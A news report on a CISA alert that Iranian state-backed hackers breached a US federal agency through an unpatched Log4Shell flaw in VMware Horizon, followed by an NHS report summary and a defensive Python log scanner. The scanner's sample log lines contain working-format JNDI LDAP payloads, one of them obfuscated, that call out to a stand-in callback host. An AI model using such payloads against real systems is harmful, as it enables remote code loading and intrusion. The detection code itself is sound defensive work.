The U.S. government’s cybersecurity agency says hackers backed by the Iranian government compromised a federal agency that failed to patch against Log4Shell, a vulnerability fixed almost a year ago.

In an alert published Thursday, the Cybersecurity and Infrastructure Security Agency said that a federal civilian executive branch (FCEB) organization was breached by Iranian government hackers earlier in February.

CISA did not name the breached FCEB agency, a list that includes the likes of the Department of Homeland Security, the Department of the Treasury and the Federal Trade Commission, and CISA spokesperson Michael Feldman declined to answer our questions when reached by TechCrunch.

CISA said it first observed the suspected activity on the unnamed federal agency’s network months later, in April, while conducting retrospective analysis using Einstein, a government-run intrusion detection system used to protect federal civilian agency networks.

The agency found that the hackers had exploited Log4Shell, a critical zero-day vulnerability in the ubiquitous open source logging software Log4j, in an unpatched VMware Horizon server to gain initial access to the organization’s network with administrator and system-level access. VMware released security patches for Horizon servers in December. But this compromise happened even though CISA had ordered all federal civilian agencies to patch their systems affected by the Log4Shell vulnerability by December 23.

Once inside the organization’s network, CISA observed the threat actors installing XMRig, open source crypto mining software that is commonly abused by hackers for mining virtual currency on compromised computers. The attackers also installed Mimikatz, an open source credential stealer, to harvest passwords and to create a new domain administrator account. Using this newly created account, the hackers disabled Windows Defender and implanted Ngrok reverse proxies on several hosts in order to maintain their access in the future. The attackers also changed the password for the local administrator account on several hosts as a backup should the rogue domain administrator account be detected and terminated.

It’s not clear for what reason the hackers targeted the U.S. Broad access to an organization’s network can be used both for espionage and for launching destructive attacks.

CISA, which has not attributed the breach to a particular advanced persistent threat (APT) group, shared indicators of compromise (IOCs) to help network defenders detect and protect against similar compromises.

CISA also said that organizations that haven’t yet patched VMware systems against Log4Shell should assume that they’ve already been breached, and advises them to start hunting for malicious activity within their networks.

The UK National Health Service (NHS) has issued a report on the Log4Shell vulnerabilities in VMware Horizon servers. The agency also urges organizations to keep all software up to date and to prevent users from using known compromised passwords.

The report notes that a threat actor is exploiting a flaw in these unpatched servers, and that the threat actor behind the attack has not been identified.

Unknown threat actors exploiting a flaw on VMware Horizon servers

The digital security team at the NHS noted that the attackers were looking for unpatched flaws in VMware Horizon servers; the threat actors behind the attack remain unknown. The report noted that an unknown threat actor was using the vulnerability to deploy malicious web shells and maintain persistent access. As such, they conducted consecutive attacks on the servers.

In the alert, the NHS noted, “The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface™ (JNDI) via Log4Shell payloads to callback to malicious infrastructure.”

Additionally, the report stated that once the threat actor identified the weakness, they used the Lightweight Directory Access Protocol (LDAP) to retrieve a malicious Java class file. When executed, this file introduced a web shell into the VM Blast Secure Gateway service. The web shell then served as a tool for carrying out a variety of attacks. After the initial attack was launched, a series of post-exploitation activities were also conducted. These activities were used for various things, including deploying malicious software, exfiltrating data, or deploying ransomware.

As mentioned earlier, the exploit is being conducted on VMware Horizon servers that have not been patched.
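To hunt for the reconnaissance phase the NHS alert describes, a defender can sweep web-server logs for the JNDI lookup strings that Log4Shell payloads carry. The Python below is an added example, not code from CISA, the NHS or VMware; the log lines are constructed, and the scanner first collapses the nested Log4j lookups commonly used to hide the literal `${jndi:` string so that disguised and plain payloads are caught alike.

```python
import re
from dataclasses import dataclass

# Constructed sample web-server log lines (not taken from either advisory):
# a benign request, a plain JNDI lookup in the User-Agent field, and the same
# lookup disguised with nested Log4j lookups (${lower:..}, ${upper:..}, ${::-..}).
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Feb/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [01/Feb/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [01/Feb/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7:1389/b}"',
]

# Lookups commonly nested inside a payload to hide the literal "${jndi:" string.
_LOOKUP_PATTERNS = [
    re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE),  # ${lower:j} -> j
    re.compile(r"\$\{[^{}]*?:-([^{}]*)\}"),                        # ${::-j}, ${env:X:-j} -> j
]
_JNDI_RE = re.compile(r"\$\{jndi:([a-z]+):")

def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups (innermost first) so obfuscated and plain payloads compare equal."""
    for _ in range(max_rounds):
        collapsed = text
        for pattern in _LOOKUP_PATTERNS:
            collapsed = pattern.sub(r"\1", collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text.lower()

@dataclass
class Hit:
    line_no: int      # 1-based index of the offending log line
    protocol: str     # JNDI scheme the payload points at (ldap, rmi, dns, ...)
    normalized: str   # de-obfuscated lookup, useful for grouping callback hosts

def scan_log(lines) -> list:
    """Return one Hit for every line that carries a (possibly obfuscated) JNDI lookup."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        norm = normalize_lookups(line)
        match = _JNDI_RE.search(norm)
        if match:
            end = norm.find("}", match.start())
            snippet = norm[match.start():] if end == -1 else norm[match.start():end + 1]
            hits.append(Hit(line_no, match.group(1), snippet))
    return hits
```

Running `scan_log(SAMPLE_LOGS)` flags lines 2 and 3 and reports both as the same `ldap://198.51.100.7:1389` callback host, which is the value worth pivoting on when checking egress logs.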